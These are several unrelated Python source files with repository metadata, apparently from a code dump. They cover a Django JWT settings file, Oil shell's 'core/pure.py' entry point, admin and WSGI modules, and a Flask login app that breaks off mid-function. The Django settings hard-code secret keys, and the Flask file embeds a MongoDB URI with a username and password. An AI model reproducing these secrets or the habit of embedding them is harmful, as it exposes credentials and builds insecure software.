from .experiment import Experiment
class Project:
def __init__(self, name: str = 'Untitled Project', notes: str = '', path: Union[Path, str] = None):
# general properties
self.id: str = generate_random_id()
self.name: str = name
self.fname: str = generate_fname(name)
self.notes: str = notes
self.path = Path(__file__).resolve() / self.fname
create_dir_for(self.path, self.name)
# experiments
self.experiments: List[Experiment] = []
def new_experiment(self, name: str):
# new_exp = Experiment(project=self)
# setup experiment?
# self.experiments += new_exp
pass
def continue_experiment(self):
pass
def open_experiment_folder(self):
open_folder(self.path)
|
[
"ilja.gubin@gmail.com"
] |
ilja.gubin@gmail.com
|
88191d016e68029871bcd820136aca3c950b9bb5
|
aa54e78c79268913f0f6bd0baf442aedd9488c6d
|
/project1/mysite/settings.py
|
60cb7d1c50efda97a46f7d3111a65d97a3e4f710
|
[] |
no_license
|
theycallmereza/SSO_DRF
|
91c1b23ec77457d04486414ba06e62fe67875ea0
|
732c1b18fd8904a18d1d05abdcd05b3a189a2ac9
|
refs/heads/main
| 2022-12-31T18:07:52.274962
| 2020-10-20T09:42:38
| 2020-10-20T09:42:38
| 305,660,623
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,395
|
py
|
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'vk%v)!xp!%z@on81od4w@73b_s@*tl9feg6&d9raq5hm92r'
JWT_SECRET = 'hf^(i($8c@*_m9dw7l6txm4veknd4&)xierp7cbe_gcb%s#n+#'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'users.apps.UsersConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework_simplejwt.authentication.JWTTokenUserAuthentication',
)
}
SIMPLE_JWT = {
'SIGNING_KEY': JWT_SECRET,
}
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
|
[
"mrreza1394@gmail.com"
] |
mrreza1394@gmail.com
|
1b7dd8b14c2820ca1ea9341ae38572dbd762f427
|
2d82d4c6574bd6d32f2cf1c781615f7951f55f66
|
/muntjac/demo/sampler/features/commons/Tooltips.py
|
33a405640b2f7a58de9da8da0ff08594edf9c4c6
|
[
"Apache-2.0"
] |
permissive
|
metaperl/muntjac
|
f83f745ee03942a61af92ee7fba7285aa9c46f3c
|
8db97712edd81b4d25deaaa48587d2a08010f2c8
|
refs/heads/master
| 2021-01-15T22:04:25.057862
| 2012-11-09T03:52:59
| 2012-11-09T03:52:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 930
|
py
|
from muntjac.ui.abstract_component import AbstractComponent
from muntjac.demo.sampler.APIResource import APIResource
from muntjac.demo.sampler.Feature import Feature, Version
class Tooltips(Feature):
def getSinceVersion(self):
return Version.OLD
def getName(self):
return 'Tooltips'
def getDescription(self):
return ('Most components can have a <i>description</i>,'
' which is usually shown as a <i>\"tooltip\"</i>.'
' In the Form component, the description is shown at the'
' top of the form.'
' Descriptions can have HTML formatted (\'rich\') content.<br/>')
def getRelatedAPI(self):
return [APIResource(AbstractComponent)]
def getRelatedFeatures(self):
# TODO Auto-generated method stub
return None
def getRelatedResources(self):
# TODO Auto-generated method stub
return None
|
[
"r.w.lincoln@gmail.com"
] |
r.w.lincoln@gmail.com
|
e883bb2b8fe918c70d9a1bd48a775eafad629add
|
66e58cba20414214ebca7bb4a035796d379f57f1
|
/myEnvironments/djangoEnv/bin/easy_install
|
3f468da3298dccfe2cb2e694063cb752ef85651d
|
[] |
no_license
|
NathanHaberman/Python-Flask-Django-CodingDojo
|
08623db1c1fa9076cd90901fed39678b2a8b795a
|
c6013c9e8133a7e2b70bfc357c3364edf3992d1c
|
refs/heads/master
| 2021-01-23T17:09:25.703718
| 2017-09-21T21:09:03
| 2017-09-21T21:09:03
| 102,763,626
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 307
|
#!/Users/nathanhaberman/Desktop/CodingDojo/Python-Stack/myEnvironments/djangoEnv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"na.haberman@gmail.com"
] |
na.haberman@gmail.com
|
|
fa7d50f644f8083f0e9aa2de873152e9a024ecb6
|
f567981e9a655cee0c835aaaad2eb55bf5d02485
|
/hp/wsgi.py
|
e01ba6cc9e5f3bd1c40abaa4e3aa75f3e78709ff
|
[] |
no_license
|
43ndr1k/mezzanine-rest-api
|
b48b4db7b75d2acf18fa5e348d245f78ffb4352f
|
d6c6449a323ec605a569d8afcd0a1602549c7847
|
refs/heads/master
| 2021-01-13T00:38:02.834689
| 2015-11-28T13:14:11
| 2015-11-28T13:14:11
| 47,024,818
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 480
|
py
|
"""
WSGI config for hp project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
from mezzanine.utils.conf import real_project_name
os.environ.setdefault("DJANGO_SETTINGS_MODULE",
"%s.settings" % real_project_name("hp"))
application = get_wsgi_application()
|
[
"dj-blackfire@gmx.de"
] |
dj-blackfire@gmx.de
|
5eec26bd85986778f068ccd0602f46212dc55208
|
d19a3a03a74fb9756e426099610acf19c2373399
|
/app_sancho/admin.py
|
c5ec937f6f19381879736285931b40b28e0cf814
|
[] |
no_license
|
bogdanned/dulcinea
|
68c55cf337088e3af9de0ed6f5d3da4bfbfafa10
|
5d2b028183e942dafb0b60008f58e384bceaf2e2
|
refs/heads/master
| 2022-01-13T02:04:34.815437
| 2016-08-11T00:18:21
| 2016-08-11T00:18:21
| 84,355,258
| 0
| 0
| null | 2022-01-10T14:09:55
| 2017-03-08T18:53:38
|
Python
|
UTF-8
|
Python
| false
| false
| 922
|
py
|
from django.contrib import admin
from .models import *
# Register your models here.
class CustomerAdminDatabaseInline(admin.TabularInline):
model = CustomerDatabase
fk_name = "customer"
class CustomerAdminStackInline(admin.TabularInline):
model = CustomerStack
fk_name = "customer"
class CustomerAdmin(admin.ModelAdmin):
model = Customer
inlines = [
CustomerAdminDatabaseInline,
CustomerAdminStackInline,
]
class ProductAdmin(admin.ModelAdmin):
list_display = ['customer_product_id','name','created','price']
list_filter = ['category']
class CategoryAdmin(admin.ModelAdmin):
list_display = ['customer_category_id','name','customer_parent_category']
admin.site.register(Product, ProductAdmin)
admin.site.register(Category, CategoryAdmin)
admin.site.register(Customer, CustomerAdmin)
admin.site.register(CustomerStack)
admin.site.register(CustomerDatabase)
|
[
"bogdanned32@gmail.com"
] |
bogdanned32@gmail.com
|
e9ed379ebab1f9e8228d64816d9318149e27deea
|
50d120638e466c8d18db7afe9a316a9e853428aa
|
/core/pure.py
|
40f4443e9e538eb54322f4b6c0acec88e36e0b7e
|
[] |
no_license
|
sailfish009/oil
|
75eff015ded810947de681685f20b01eb583d794
|
538cd57ca8afd1833e3b15eeddecf874a2ffc4a6
|
refs/heads/master
| 2023-01-07T20:54:53.515031
| 2020-11-08T06:33:49
| 2020-11-08T07:08:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 20,410
|
py
|
#!/usr/bin/env python2
"""
core/main.py -- Entry point for the shell interpreter.
"""
from __future__ import print_function
import time as time_
from _devbuild.gen import arg_types
from _devbuild.gen.option_asdl import builtin_i
from _devbuild.gen.runtime_asdl import cmd_value
from _devbuild.gen.syntax_asdl import source
from asdl import format as fmt
from asdl import runtime
from core import alloc
from core import dev
from core import error
from core import executor
from core import main_loop
from core import process
from core.pyerror import e_usage
from core import pyutil
from core.pyutil import stderr_line
from core import state
from core import ui
from core import util
from core.pyerror import log, e_die
from core import vm
from frontend import args
from frontend import consts
from frontend import flag_def # side effect: flags are defined!
_ = flag_def
from frontend import flag_spec
from frontend import reader
from frontend import parse_lib
from osh import builtin_assign
from osh import builtin_bracket
from osh import builtin_meta
from osh import builtin_misc
from osh import builtin_printf
#from osh import builtin_process
from osh import builtin_pure
from osh import cmd_eval
from osh import prompt
from osh import sh_expr_eval
from osh import split
from osh import word_eval
from mycpp import mylib
from pylib import os_path
import posix_ as posix
from typing import List, Dict, Optional, Any, TYPE_CHECKING
if TYPE_CHECKING:
from _devbuild.gen.runtime_asdl import cmd_value__Argv, Proc
from core import optview
from oil_lang import expr_eval
from pgen2 import grammar
def MakeBuiltinArgv(argv1):
# type: (List[str]) -> cmd_value__Argv
argv = [''] # dummy for argv[0]
argv.extend(argv1)
# no location info
return cmd_value.Argv(argv, [runtime.NO_SPID] * len(argv), None)
def AddPure(b, mem, procs, mutable_opts, aliases, search_path, errfmt):
# type: (Dict[int, vm._Builtin], state.Mem, Dict[str, Proc], state.MutableOpts, Dict[str, str], state.SearchPath, ui.ErrorFormatter) -> None
b[builtin_i.set] = builtin_pure.Set(mutable_opts, mem)
b[builtin_i.alias] = builtin_pure.Alias(aliases, errfmt)
b[builtin_i.unalias] = builtin_pure.UnAlias(aliases, errfmt)
b[builtin_i.hash] = builtin_pure.Hash(search_path)
b[builtin_i.getopts] = builtin_pure.GetOpts(mem, errfmt)
true_ = builtin_pure.Boolean(0)
b[builtin_i.colon] = true_ # a "special" builtin
b[builtin_i.true_] = true_
b[builtin_i.false_] = builtin_pure.Boolean(1)
b[builtin_i.shift] = builtin_assign.Shift(mem)
b[builtin_i.type] = builtin_meta.Type(procs, aliases, search_path, errfmt)
def AddIO(b, mem, dir_stack, exec_opts, splitter, parse_ctx, errfmt):
# type: (Dict[int, vm._Builtin], state.Mem, state.DirStack, optview.Exec, split.SplitContext, parse_lib.ParseContext, ui.ErrorFormatter) -> None
mapfile = builtin_misc.MapFile(mem, errfmt)
b[builtin_i.echo] = builtin_pure.Echo(exec_opts)
b[builtin_i.mapfile] = mapfile
b[builtin_i.readarray] = mapfile
b[builtin_i.read] = builtin_misc.Read(splitter, mem, parse_ctx)
b[builtin_i.cat] = builtin_misc.Cat() # for $(<file)
# test / [ differ by need_right_bracket
b[builtin_i.test] = builtin_bracket.Test(False, exec_opts, mem, errfmt)
b[builtin_i.bracket] = builtin_bracket.Test(True, exec_opts, mem, errfmt)
b[builtin_i.pushd] = builtin_misc.Pushd(mem, dir_stack, errfmt)
b[builtin_i.popd] = builtin_misc.Popd(mem, dir_stack, errfmt)
b[builtin_i.dirs] = builtin_misc.Dirs(mem, dir_stack, errfmt)
b[builtin_i.pwd] = builtin_misc.Pwd(mem, errfmt)
b[builtin_i.times] = builtin_misc.Times()
def AddMeta(builtins, shell_ex, mutable_opts, mem, procs, aliases, search_path,
errfmt):
# type: (Dict[int, vm._Builtin], vm._Executor, state.MutableOpts, state.Mem, Dict[str, Proc], Dict[str, str], state.SearchPath, ui.ErrorFormatter) -> None
builtins[builtin_i.builtin] = builtin_meta.Builtin(shell_ex, errfmt)
builtins[builtin_i.command] = builtin_meta.Command(shell_ex, procs, aliases,
search_path)
builtins[builtin_i.run] = builtin_meta.Run_(mutable_opts, mem, shell_ex, errfmt)
def AddBlock(builtins, mem, mutable_opts, dir_stack, cmd_ev, errfmt):
# type: (Dict[int, vm._Builtin], state.Mem, state.MutableOpts, state.DirStack, cmd_eval.CommandEvaluator, ui.ErrorFormatter) -> None
# These builtins take blocks, and thus need cmd_ev.
builtins[builtin_i.cd] = builtin_misc.Cd(mem, dir_stack, cmd_ev, errfmt)
builtins[builtin_i.shopt] = builtin_pure.Shopt(mutable_opts, cmd_ev)
if 0:
from osh import builtin_process
def AddProcess(
b, # type: Dict[int, vm._Builtin]
mem, # type: state.Mem
shell_ex, # type: vm._Executor
ext_prog, # type: process.ExternalProgram
fd_state, # type: process.FdState
job_state, # type: process.JobState
waiter, # type: process.Waiter
search_path, # type: state.SearchPath
errfmt # type: ui.ErrorFormatter
):
# type: (...) -> None
# Process
b[builtin_i.exec_] = builtin_process.Exec(mem, ext_prog, fd_state,
search_path, errfmt)
b[builtin_i.wait] = builtin_process.Wait(waiter, job_state, mem, errfmt)
b[builtin_i.jobs] = builtin_process.Jobs(job_state)
b[builtin_i.fg] = builtin_process.Fg(job_state, waiter)
b[builtin_i.bg] = builtin_process.Bg(job_state)
b[builtin_i.umask] = builtin_process.Umask()
b[builtin_i.fork] = builtin_process.Fork(shell_ex)
b[builtin_i.forkwait] = builtin_process.ForkWait(shell_ex)
def InitAssignmentBuiltins(mem, procs, errfmt):
# type: (state.Mem, Dict[str, Proc], ui.ErrorFormatter) -> Dict[int, vm._AssignBuiltin]
assign_b = {} # type: Dict[int, vm._AssignBuiltin]
new_var = builtin_assign.NewVar(mem, procs, errfmt)
assign_b[builtin_i.declare] = new_var
assign_b[builtin_i.typeset] = new_var
assign_b[builtin_i.local] = new_var
assign_b[builtin_i.export_] = builtin_assign.Export(mem, errfmt)
assign_b[builtin_i.readonly] = builtin_assign.Readonly(mem, errfmt)
return assign_b
def Main(lang, arg_r, environ, login_shell, loader, line_input):
# type: (str, args.Reader, Dict[str, str], bool, pyutil._ResourceLoader, Any) -> int
"""The full shell lifecycle. Used by bin/osh and bin/oil.
Args:
lang: 'osh' or 'oil'
argv0, arg_r: command line arguments
environ: environment
login_shell: Was - on the front?
loader: to get help, version, grammar, etc.
line_input: optional GNU readline
"""
# Differences between osh and oil:
# - --help? I guess Oil has a SUPERSET of OSH options.
# - oshrc vs oilrc
# - shopt -s oil:all
# - Change the prompt in the interactive shell?
# osh-pure:
# - no oil grammar
# - no expression evaluator
# - no interactive shell, or line_input
# - no process.*
# process.{ExternalProgram,Waiter,FdState,JobState,SignalState} -- we want
# to evaluate config files without any of these
# Modules not translated yet: completion, comp_ui, builtin_comp, process
# - word evaluator
# - shouldn't glob? set -o noglob? or hard failure?
# - ~ shouldn't read from the file system
# - I guess it can just be the HOME=HOME?
# Builtin:
# shellvm -c 'echo hi'
# shellvm <<< 'echo hi'
argv0 = arg_r.Peek()
assert argv0 is not None
arg_r.Next()
assert lang in ('osh', 'oil'), lang
try:
attrs = flag_spec.ParseMore('main', arg_r)
except error.Usage as e:
stderr_line('osh usage error: %s', e.msg)
return 2
flag = arg_types.main(attrs.attrs)
arena = alloc.Arena()
errfmt = ui.ErrorFormatter(arena)
help_builtin = builtin_misc.Help(loader, errfmt)
if flag.help:
help_builtin.Run(MakeBuiltinArgv(['%s-usage' % lang]))
return 0
if flag.version:
# OSH version is the only binary in Oil right now, so it's all one version.
pyutil.ShowAppVersion('Oil', loader)
return 0
no_str = None # type: str
debug_stack = [] # type: List[state.DebugFrame]
if arg_r.AtEnd():
dollar0 = argv0
else:
dollar0 = arg_r.Peek() # the script name, or the arg after -c
# Copy quirky bash behavior.
frame0 = state.DebugFrame(dollar0, 'main', no_str, state.LINE_ZERO, 0, 0)
debug_stack.append(frame0)
# Copy quirky bash behavior.
frame1 = state.DebugFrame(no_str, no_str, no_str, runtime.NO_SPID, 0, 0)
debug_stack.append(frame1)
script_name = arg_r.Peek() # type: Optional[str]
arg_r.Next()
mem = state.Mem(dollar0, arg_r.Rest(), arena, debug_stack)
opt_hook = state.OptHook()
parse_opts, exec_opts, mutable_opts = state.MakeOpts(mem, opt_hook)
# Note: only MutableOpts needs mem, so it's not a true circular dep.
mem.exec_opts = exec_opts # circular dep
mutable_opts.Init()
version_str = pyutil.GetVersion(loader)
state.InitMem(mem, environ, version_str)
procs = {} # type: Dict[str, Proc]
job_state = process.JobState()
fd_state = process.FdState(errfmt, job_state, mem)
if attrs.show_options: # special case: sh -o
mutable_opts.ShowOptions([])
return 0
# Set these BEFORE processing flags, so they can be overridden.
if lang == 'oil':
mutable_opts.SetShoptOption('oil:all', True)
builtin_pure.SetShellOpts(mutable_opts, attrs.opt_changes, attrs.shopt_changes)
# feedback between runtime and parser
aliases = {} # type: Dict[str, str]
oil_grammar = None # type: grammar.Grammar
#oil_grammar = pyutil.LoadOilGrammar(loader)
if flag.one_pass_parse and not exec_opts.noexec():
e_usage('--one-pass-parse requires noexec (-n)')
parse_ctx = parse_lib.ParseContext(arena, parse_opts, aliases, oil_grammar)
parse_ctx.Init_OnePassParse(flag.one_pass_parse)
# Three ParseContext instances SHARE aliases.
comp_arena = alloc.Arena()
comp_arena.PushSource(source.Unused('completion'))
trail1 = parse_lib.Trail()
# one_pass_parse needs to be turned on to complete inside backticks. TODO:
# fix the issue where ` gets erased because it's not part of
# set_completer_delims().
comp_ctx = parse_lib.ParseContext(comp_arena, parse_opts, aliases,
oil_grammar)
comp_ctx.Init_Trail(trail1)
comp_ctx.Init_OnePassParse(True)
hist_arena = alloc.Arena()
hist_arena.PushSource(source.Unused('history'))
trail2 = parse_lib.Trail()
hist_ctx = parse_lib.ParseContext(hist_arena, parse_opts, aliases,
oil_grammar)
hist_ctx.Init_Trail(trail2)
# Deps helps manages dependencies. These dependencies are circular:
# - cmd_ev and word_ev, arith_ev -- for command sub, arith sub
# - arith_ev and word_ev -- for $(( ${a} )) and $x$(( 1 ))
# - cmd_ev and builtins (which execute code, like eval)
# - prompt_ev needs word_ev for $PS1, which needs prompt_ev for @P
cmd_deps = cmd_eval.Deps()
cmd_deps.mutable_opts = mutable_opts
# TODO: In general, cmd_deps are shared between the mutually recursive
# evaluators. Some of the four below are only shared between a builtin and
# the CommandEvaluator, so we could put them somewhere else.
cmd_deps.traps = {}
cmd_deps.trap_nodes = [] # TODO: Clear on fork() to avoid duplicates
waiter = process.Waiter(job_state, exec_opts)
my_pid = posix.getpid()
debug_path = ''
debug_dir = environ.get('OSH_DEBUG_DIR')
if flag.debug_file is not None:
# --debug-file takes precedence over OSH_DEBUG_DIR
debug_path = flag.debug_file
elif debug_dir is not None:
debug_path = os_path.join(debug_dir, '%d-osh.log' % my_pid)
if len(debug_path):
raise NotImplementedError()
else:
debug_f = util.NullDebugFile() # type: util._DebugFile
cmd_deps.debug_f = debug_f
# Not using datetime for dependency reasons. TODO: maybe show the date at
# the beginning of the log, and then only show time afterward? To save
# space, and make space for microseconds. (datetime supports microseconds
# but time.strftime doesn't).
if mylib.PYTHON:
iso_stamp = time_.strftime("%Y-%m-%d %H:%M:%S")
debug_f.log('%s [%d] OSH started with argv %s', iso_stamp, my_pid, arg_r.argv)
if len(debug_path):
debug_f.log('Writing logs to %r', debug_path)
interp = environ.get('OSH_HIJACK_SHEBANG', '')
search_path = state.SearchPath(mem)
ext_prog = process.ExternalProgram(interp, fd_state, errfmt, debug_f)
splitter = split.SplitContext(mem)
# This could just be OSH_DEBUG_STREAMS='debug crash' ? That might be
# stuffing too much into one, since a .json crash dump isn't a stream.
crash_dump_dir = environ.get('OSH_CRASH_DUMP_DIR', '')
cmd_deps.dumper = dev.CrashDumper(crash_dump_dir)
if flag.xtrace_to_debug_file:
trace_f = debug_f
else:
trace_f = util.DebugFile(mylib.Stderr())
#comp_lookup = completion.Lookup()
# Various Global State objects to work around readline interfaces
#compopt_state = completion.OptionState()
#comp_ui_state = comp_ui.State()
#prompt_state = comp_ui.PromptState()
dir_stack = state.DirStack()
#
# Initialize builtins that don't depend on evaluators
#
builtins = {} # type: Dict[int, vm._Builtin]
AddPure(builtins, mem, procs, mutable_opts, aliases, search_path, errfmt)
AddIO(builtins, mem, dir_stack, exec_opts, splitter, parse_ctx, errfmt)
builtins[builtin_i.help] = help_builtin
#
# Initialize Evaluators
#
arith_ev = sh_expr_eval.ArithEvaluator(mem, exec_opts, parse_ctx, errfmt)
bool_ev = sh_expr_eval.BoolEvaluator(mem, exec_opts, parse_ctx, errfmt)
expr_ev = None # type: expr_eval.OilEvaluator
word_ev = word_eval.NormalWordEvaluator(mem, exec_opts, mutable_opts,
splitter, errfmt)
assign_b = InitAssignmentBuiltins(mem, procs, errfmt)
cmd_ev = cmd_eval.CommandEvaluator(mem, exec_opts, errfmt, procs,
assign_b, arena, cmd_deps)
shell_ex = executor.ShellExecutor(
mem, exec_opts, mutable_opts, procs, builtins, search_path,
ext_prog, waiter, job_state, fd_state, errfmt)
#shell_ex = NullExecutor(exec_opts, mutable_opts, procs, builtins)
# PromptEvaluator rendering is needed in non-interactive shells for @P.
prompt_ev = prompt.Evaluator(lang, parse_ctx, mem)
tracer = dev.Tracer(parse_ctx, exec_opts, mutable_opts, mem, word_ev, trace_f)
# Wire up circular dependencies.
vm.InitCircularDeps(arith_ev, bool_ev, expr_ev, word_ev, cmd_ev, shell_ex,
prompt_ev, tracer)
#
# Initialize builtins that depend on evaluators
#
# note: 'printf -v a[i]' and 'unset a[i]' require same deps
builtins[builtin_i.printf] = builtin_printf.Printf(mem, exec_opts, parse_ctx,
arith_ev, errfmt)
builtins[builtin_i.unset] = builtin_assign.Unset(mem, exec_opts, procs,
parse_ctx, arith_ev, errfmt)
builtins[builtin_i.eval] = builtin_meta.Eval(parse_ctx, exec_opts, cmd_ev)
#source_builtin = builtin_meta.Source(parse_ctx, search_path, cmd_ev,
#fd_state, errfmt)
#builtins[builtin_i.source] = source_builtin
#builtins[builtin_i.dot] = source_builtin
AddMeta(builtins, shell_ex, mutable_opts, mem, procs, aliases, search_path,
errfmt)
AddBlock(builtins, mem, mutable_opts, dir_stack, cmd_ev, errfmt)
#sig_state = process.SignalState()
#sig_state.InitShell()
#builtins[builtin_i.trap] = builtin_process.Trap(sig_state, cmd_deps.traps,
# cmd_deps.trap_nodes,
# parse_ctx, errfmt)
if flag.c is not None:
arena.PushSource(source.CFlag())
line_reader = reader.StringLineReader(flag.c, arena) # type: reader._Reader
if flag.i: # -c and -i can be combined
mutable_opts.set_interactive()
elif flag.i: # force interactive
raise NotImplementedError()
else:
if script_name is None:
stdin = mylib.Stdin()
arena.PushSource(source.Stdin(''))
line_reader = reader.FileLineReader(stdin, arena)
else:
arena.PushSource(source.MainFile(script_name))
try:
f = fd_state.Open(script_name)
#f = mylib.open(script_name)
except OSError as e:
stderr_line("osh: Couldn't open %r: %s", script_name,
pyutil.strerror(e))
return 1
line_reader = reader.FileLineReader(f, arena)
# TODO: assert arena.NumSourcePaths() == 1
# TODO: .rc file needs its own arena.
c_parser = parse_ctx.MakeOshParser(line_reader)
if exec_opts.interactive():
raise NotImplementedError()
if exec_opts.noexec():
status = 0
try:
node = main_loop.ParseWholeFile(c_parser)
except error.Parse as e:
ui.PrettyPrintError(e, arena)
status = 2
if status == 0 :
if flag.parser_mem_dump is not None: # only valid in -n mode
input_path = '/proc/%d/status' % posix.getpid()
pyutil.CopyFile(input_path, flag.parser_mem_dump)
ui.PrintAst(node, flag)
else:
if flag.parser_mem_dump is not None:
e_usage('--parser-mem-dump can only be used with -n')
try:
status = main_loop.Batch(cmd_ev, c_parser, arena,
cmd_flags=cmd_eval.IsMainProgram)
except util.UserExit as e:
status = e.status
box = [status]
cmd_ev.MaybeRunExitTrap(box)
status = box[0]
# NOTE: 'exit 1' is ControlFlow and gets here, but subshell/commandsub
# don't because they call sys.exit().
if flag.runtime_mem_dump is not None:
input_path = '/proc/%d/status' % posix.getpid()
pyutil.CopyFile(input_path, flag.runtime_mem_dump)
# NOTE: We haven't closed the file opened with fd_state.Open
return status
class NullExecutor(vm._Executor):
def __init__(self, exec_opts, mutable_opts, procs, builtins):
# type: (optview.Exec, state.MutableOpts, Dict[str, Proc], Dict[int, vm._Builtin]) -> None
vm._Executor.__init__(self)
self.exec_opts = exec_opts
self.mutable_opts = mutable_opts
self.procs = procs
self.builtins = builtins
def RunBuiltin(self, builtin_id, cmd_val):
# type: (int, cmd_value__Argv) -> int
"""Run a builtin. Also called by the 'builtin' builtin."""
builtin_func = self.builtins[builtin_id]
try:
status = builtin_func.Run(cmd_val)
except error.Usage as e:
status = 2
finally:
pass
return status
def RunSimpleCommand(self, cmd_val, do_fork, call_procs=True):
# type: (cmd_value__Argv, bool, bool) -> int
argv = cmd_val.argv
span_id = cmd_val.arg_spids[0] if len(cmd_val.arg_spids) else runtime.NO_SPID
arg0 = argv[0]
builtin_id = consts.LookupSpecialBuiltin(arg0)
if builtin_id != consts.NO_INDEX:
return self.RunBuiltin(builtin_id, cmd_val)
# Copied from core/executor.py
if call_procs:
proc_node = self.procs.get(arg0)
if proc_node is not None:
if (self.exec_opts.strict_errexit() and
self.mutable_opts.ErrExitIsDisabled()):
# TODO: make errfmt a member
#self.errfmt.Print_('errexit was disabled for this construct',
# span_id=self.mutable_opts.errexit.spid_stack[0])
#stderr_line('')
e_die("Can't run a proc while errexit is disabled. "
"Use 'catch' or wrap it in a process with $0 myproc",
span_id=span_id)
# NOTE: Functions could call 'exit 42' directly, etc.
status = self.cmd_ev.RunProc(proc_node, argv[1:])
return status
builtin_id = consts.LookupNormalBuiltin(arg0)
if builtin_id != consts.NO_INDEX:
return self.RunBuiltin(builtin_id, cmd_val)
# See how many tests will pass
#if mylib.PYTHON:
if 0: # osh_eval.cc will pass 1078 rather than 872 by enabling
import subprocess
try:
status = subprocess.call(cmd_val.argv)
except OSError as e:
log('Error running %s: %s', cmd_val.argv, e)
return 1
return status
log('Unhandled SimpleCommand')
f = mylib.Stdout()
#ast_f = fmt.DetectConsoleOutput(f)
# Stupid Eclipse debugger doesn't display ANSI
ast_f = fmt.TextOutput(f)
tree = cmd_val.PrettyTree()
ast_f.FileHeader()
fmt.PrintTree(tree, ast_f)
ast_f.FileFooter()
ast_f.write('\n')
return 0
|
[
"andy@oilshell.org"
] |
andy@oilshell.org
|
c1a6d7f3963fbcb3b3a72a4816af8b3aa906dc59
|
ef98e726b92352a97c9a2fc29274a481601bcea0
|
/pivvy/project_tpl/application/__init__.py
|
548a92a64814feb59c1e00a89b9ed47e70af9bb0
|
[
"BSD-2-Clause"
] |
permissive
|
dennishedback/pivvy
|
c2520653379790d27518855636d28d8d92f03b7a
|
4eee849263fe9485fe94ac7c5ea8855c4c0a6f4b
|
refs/heads/master
| 2020-03-26T06:17:08.416720
| 2018-08-13T14:51:53
| 2018-08-13T15:22:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 428
|
py
|
#
# This is an example plugin, change it as you see fit :)
#
import pivvy
def on_load():
pivvy.vars.g___SNAKE_CASE_PLACEHOLDER___message = "Hello, world!"
pivvy.define_command("HelloWorld", hello_world)
pivvy.define_command("HelloName", hello_name)
def hello_world():
print(pivvy.vars.g___SNAKE_CASE_PLACEHOLDER___message)
def hello_name(name):
pivvy.current.buffer.append("Hello, {0}!".format(name))
|
[
"d.hedback@gmail.com"
] |
d.hedback@gmail.com
|
c575696284cd0dcdaa28263d64d1895d95e38117
|
0e0ce88c886370df9af51855115c99dfc003e5da
|
/2020/08_Flask/18_login_register/run.py
|
c159a0bae0804faaee74d71602f2e17462ed686c
|
[] |
no_license
|
miguelzeph/Python_Git
|
ed80db9a4f060836203df8cc2e42e003b0df6afd
|
79d3b00236e7f4194d2a23fb016b43e9d09311e6
|
refs/heads/master
| 2021-07-08T18:43:45.855023
| 2021-04-01T14:12:23
| 2021-04-01T14:12:23
| 232,007,012
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,683
|
py
|
from flask import Flask, session, request, url_for, redirect, render_template, flash
from flask_pymongo import PyMongo
app = Flask(__name__)
app.config['MONGO_URI'] = "mongodb+srv://useradmin:admin@cluster0.7rvyr.gcp.mongodb.net/TESTE_LOGIN?retryWrites=true&w=majority"
app.config['SECRET_KEY'] = 'mysecretkey'
mongo = PyMongo(app)
@app.route('/')
def index():
log = False
nome = '...'
if 'log' in session and 'nome' in session:
log = True
